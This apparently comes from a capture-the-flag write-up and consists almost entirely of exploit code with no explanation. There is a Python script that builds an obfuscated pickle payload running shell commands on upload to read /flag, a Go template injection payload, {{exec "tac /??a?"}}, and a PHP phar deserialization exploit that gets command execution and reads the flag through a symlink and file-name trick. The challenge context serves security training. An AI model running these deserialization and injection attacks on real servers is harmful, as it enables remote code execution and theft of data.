1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

import os
import pickle
import requests

url = "http://web-578d79b48d.challenge.longjiancup.cn"
cookie = {
    "session":"eyJ1c2VyX2lkIjoyfQ.aLvWng.NUtTEjboDFHFuUiboHU38M3JqdU"
}


class CHIKAWA:
    def __init__(self):
        self.model_name = "Example"
        self.data = rb"""cos
system
(V\u0066\u0069\u006e\u0064\u0020\u002f\u0020\u002d\u006e\u0061\u006d\u0065\u0020\u0022\u0065\u0078\u0061\u006d\u0070\u006c\u0065\u002e\u0070\u006b\u006c\u0022\u0020\u002d\u0074\u0079\u0070\u0065\u0020\u0066\u0020\u002d\u0065\u0078\u0065\u0063\u0020\u0073\u0068\u0020\u002d\u0063\u0020\u0027\u0063\u0061\u0074\u0020\u002f\u0066\u006c\u0061\u0067\u003e\u0020\u0022\u0024\u0030\u0022\u0027\u0020\u007b\u007d\u0020\u005c\u003b
tR."""
        self.parameters = ""

payload = pickle.dumps(CHIKAWA())
filename = "abcd.pkl"

with open(filename, "wb") as f:
    f.write(payload)
    f.close()

res = requests.post(url+"/upload",files={"file":open(filename,"rb")},cookies=cookie)
os.remove(filename)

1
2
3

{{.}}

{{exec "tac /??a?"}}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77

import http.client
import urllib.parse
import gzip
import re
import time
import socket

def _post(url, body, headers=None, timeout=None):
    u = urllib.parse.urlsplit(url)
    host = u.hostname
    port = u.port or (80 if u.scheme == 'http' else 443)
    path = u.path or '/'
    if u.query:
        path += '?' + u.query
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("POST", path, body=body, headers=headers or {'Content-Type':'application/x-www-form-urlencoded'})
        resp = conn.getresponse()
        data = resp.read().decode('utf-8', 'ignore')
        return data
    finally:
        conn.close()

def write(url):
    with open('phar.phar', 'rb') as f:
        raw = f.read()
    gz = gzip.compress(raw)
    v0 = urllib.parse.quote_from_bytes(gz)
    body = '1=' + 'O:7:"Acheron":1:{s:4:"mode";s:1:"w";}' + '&0=' + v0
    r = _post(url, body, {'Content-Type':'application/x-www-form-urlencoded'})
    m = re.search(r'/tmp/[0-9a-f]{32}\.phar', r)
    if not m:
        return None
    return m.group(0)

def read(url, phar_path):
    v0 = urllib.parse.quote(phar_path, safe='')
    body = '1=' + 'O:7:"Acheron":1:{s:4:"mode";s:1:"r";}' + '&0=' + v0
    r = _post(url, body, {'Content-Type':'application/x-www-form-urlencoded'})
    m = re.search(r'flag', r)
    return m.group(0) if m else None

def runtime_exec(url, phar_path, cmd):
    v0 = urllib.parse.quote(phar_path, safe='')
    v2 = urllib.parse.quote(cmd, safe='')
    body = '1=' + 'O:7:"Acheron":1:{s:4:"mode";s:1:"r";}' + '&0=' + v0 + '&2=' + v2
    r = _post(url + "?1=system($_POST[2]);", body, {'Content-Type':'application/x-www-form-urlencoded'})
    return r


def getflag(url, phar_path):
    r1 = runtime_exec(url, phar_path,"pwd")
    m1 = re.search(r'/var/www/html', r1)
    if m1 :
        print("[+] 命中标记，可以进行下一步")
        runtime_exec(url, phar_path, "touch -- -H")
        print("成功创建覆盖项")
        time.sleep(1)
        runtime_exec(url, phar_path, "ln -s /flag flag")
        print("成功创建软连接")
        time.sleep(15)
        r2 = runtime_exec(url, phar_path, "cat backup/flag")
        m2 = re.search(r'flag\{[^}\r\n]+\}', r2, re.I)
        if m2:
            return m2.group(0)
    else :
        print("[-] 未命中标记，退出或重试")

if __name__ == '__main__':
    url = "http://156.239.238.130:8000/"
    phar_path = write(url)
    if phar_path:
        time.sleep(1)
        print(read(url, phar_path))
        time.sleep(1)
        flag=getflag(url, phar_path)
        print(flag)